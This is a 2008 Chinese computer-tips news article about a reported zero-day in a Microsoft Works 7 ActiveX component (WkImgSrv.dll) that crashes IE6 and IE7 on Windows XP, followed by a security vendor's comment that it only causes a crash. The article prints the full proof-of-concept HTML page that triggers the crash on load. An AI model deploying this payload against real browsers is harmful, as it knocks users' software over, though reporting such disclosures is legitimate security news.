注册本站  论坛  繁體中文

电脑技巧
手机 | MP3 | MP4 | 显卡 | 主板 | 显示器 | 光存储 | 笔记本 | 网络设备 | 移动存储 | 数码相机
键鼠 | CPU | 音箱 | GPS | 电视 | 服务器 | 投影机 | 机箱电源 | 品牌电脑 | 办公打印 |
| 网站首页 | Cisco | Windows | Linux | Java | Dotnet | Oracle | 网页设计 | 平面设计 | 安全 | 软件应用 | 电脑维修 | 办公维修 |
您现在的位置: 电脑技巧 >> 安全 >> 系统安全 >> 安全正文

Windows组件0Day漏洞 通杀IE6与IE7浏览器

文章来源:赛迪网 作者:T木 更新时间:2008-4-24 12:52:07 【 】 【加入收藏

中国IT实验室4月21日报道:近日收到网友发来的邮件,反映了一个Windows 0Day漏洞。并在其博客中给出了相关代码。

[0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 测试通过。

[html]

[head]

[title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]

[script language="JavaScript"]

    function payload() {

             var num = -1;

             obj.WksPictureInterface = num; 

             }

   [/script]

[/head]

[body onload="JavaScript: return payload();"]

[object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"]

[/object]

[/body]

      [/html]

与金山专家李铁军联系,得到了珠海研发中心的回复,如下:

近几天网络上流传着一个传说为IE 0DAY的POC代码,在Windows XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的Windows XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。这段攻击代码会让浏览器崩溃,目前尚不能因此传播恶意软件。

  • 上一篇安全:

  • 下一篇安全: 没有了
  • 最 新 热 门
     金山毒霸2008解决输入法无效病毒
     确定计算机是否感染病毒和恢复方法以及防止…
     让卡巴斯基仅监控选中的端口
     四个检测硬盘与内存的绝招
     建立局域网防病毒控制系统针对性防范病毒
     2008年年末全球病毒和木马的种类将超过100万…
     自动播放功能引起的病毒的预防
     AUTO木马群的毒霸解决方案
     机器中木马病毒后怎么解决呢?
     格式化硬盘都不行时该如何杀毒呢?
    最 新 推 荐
     Windows组件0Day漏洞 通杀IE6与IE7浏览器
     赛门铁克警告中文版Win2000 GDI安全漏洞
     免费绝招 九项不用花钱的安全防护
     Windows Vista SP1新变化全方位解析
     官方数据:微软帮你测试密码强度
     走近Linux防护 铲除病毒两大威胁!
     计算机在中毒后的五大紧急处理措施
     “艳照门”警钟!编辑教你保护个人隐私
     安全性与密码相对强度的暗战
     三年不重装 令Windows百毒不侵13妙招
    相 关 文 章

    赛门铁克警告中文版Win2000 GDI安全漏洞
    赛门铁克警告中文版Win2000安全漏洞
    关闭无用服务保证Windows系统安全
    Windows Vista SP1新变化全方位解析
    走近Linux防护 铲除病毒两大威胁!
    三年不重装 令Windows百毒不侵13妙招
    Windows激活木马的解决办法
    Windows核实激活木马并提出解决办法
    让电脑裸奔 制作百毒不侵的Windows系统
    新木马下载器 隐藏WINDOWS文件保护窗口

    | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告

     

    Copyright 2006-2008 pcjx.com All Rights Reserved
    电脑技巧 版权所有 粤ICP备06059145号 地图
    本网站所有内容未经许可不得转载或做其他使用